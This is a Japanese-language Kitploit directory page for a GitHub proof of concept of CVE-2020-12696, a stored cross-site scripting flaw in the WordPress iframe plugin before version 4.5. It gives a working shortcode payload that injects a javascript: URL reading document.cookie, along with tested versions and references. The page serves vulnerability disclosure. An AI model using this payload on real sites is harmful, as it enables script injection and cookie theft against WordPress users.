Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-12696 — 保存型クロスサイトスクリプティング - iframeプラグイン - WordPress | Kitploit
ツール/GitHubGitHub/g-rubert/cve-2020-12696
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubg-rubert/cve-2020-12696

CVE-2020-12696

保存型クロスサイトスクリプティング - iframeプラグイン - WordPress

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-12696

root@kitploit:~
██╗  ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
 ╚███╔╝ ███████╗███████╗
 ██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝  ╚═╝╚══════╝╚══════╝

Iframe < 4.5 - 認証済み保存型クロスサイトスクリプティング (XSS)

iframe プラグイン 4.5 未満では、URL がサニタイズされません。

root@kitploit:~
Payload: </b>[iframe src="javascript:confirm(document.cookie)" width="100%" height="500"]
Version [plugin]: </b>4.4
Tested on: </b>WordPress 5.2.4
Researcher:</b> Guilherme Rubert

参考文献:

https://guilhermerubert.com/blog/cve-2020-12696/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12696
https://wordpress.org/plugins/iframe/#developers

ツールをダウンロード